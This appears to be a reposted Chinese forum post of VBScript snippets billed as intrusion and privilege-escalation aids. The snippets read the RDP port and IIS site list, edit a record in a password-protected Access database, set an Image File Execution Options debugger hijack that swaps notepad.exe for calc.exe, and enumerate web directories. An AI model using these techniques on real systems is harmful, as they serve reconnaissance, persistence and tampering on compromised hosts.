入侵常用vbs提权

xjyown

3389端口查询
   
Dim ReadComputerName
Set ReadComputerName=WScript.CreateObject("WScript.Shell")
Dim TSName,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSName=ReadComputerName.RegRead(TSRegPath)
WScript.Echo("TermService port is:"&TSName)
列iis信息
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
   sServerName=Obj3w.ServerComment
   Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
   ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
   End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit

VBS连接access
On Error Resume Next
dim db
db="insidert.mdb"
Set rs=CreateObject("ADODB.RecordSet")
Set conn=CreateObject("ADODB.Connection")
conn="Provider=Microsoft.Jet.OleDb.4.0;Jet OLEDB:Database Password=cq110insider;Data Source=" &db
rs.open "select * from insiderinfo where insidernumber=''123****7890''",conn,1,2
if rs.eof and rs.bof then
else
rs("sparetime")=9000
rs.update
end if
vbs操作注册表
Dim OperationRegistry
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
Dim Read_Data1,Read_Data2
Read_Data1=OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ie4\setup\path")
msgbox Read_Data1
vbs 劫持

Dim AutoRunProgram
Set AutoRunProgram=Wscript.CreateObject("Wscript.Shell")
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\"
Type_Name="REG_SZ"
Key_Name="Debugger"
Key_Data="calc.exe"
AutoRunProgram.RegWrite RegPath&Key_Name,Key_Data,Type_Name

vbs 读取目录所有文件

Function TreeIt(sPath)
Set oFso = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFso.GetFolder(sPath)
Set oSubFolders = oFolder.Subfolders
Set oFiles = oFolder.Files
For Each oFile In oFiles
  wscript.echo oFile.Path
Next
For Each oSubFolder In oSubFolders
  wscript.echo oSubFolder.Path ''目录''
  TreeIt(oSubFolder.Path)''递归
Next
Set oFolder = Nothing
Set oSubFolders = Nothing
Set oFso = Nothing
End Function
TreeIt "c:\www1\"
vbs正则表达式
Str = "<img src=""123.Gif"" alt=""dsddfsa"" >     <img src=""123.jpG"" > <img src=""123.jpg""><IMG SRC=123.JPG>"
Function getImages(Str)
      Set re = New RegExp
      re.Pattern = "<img(.+?)src=""*([^\s]+?)""*(\s|>)"
      re.Global = True
      re.IgnoreCase = True
      Set Contents = re.Execute(Str)
      For Each Match in Contents '' 遍历匹配集合。
          Images = Images + Match.SubMatches(1) + "|"
      Next
      getImages = Mid(Images, 1, Len(Images) -1)
End Function
MsgBox(getImages(Str))

文章转载自『非安全中国网』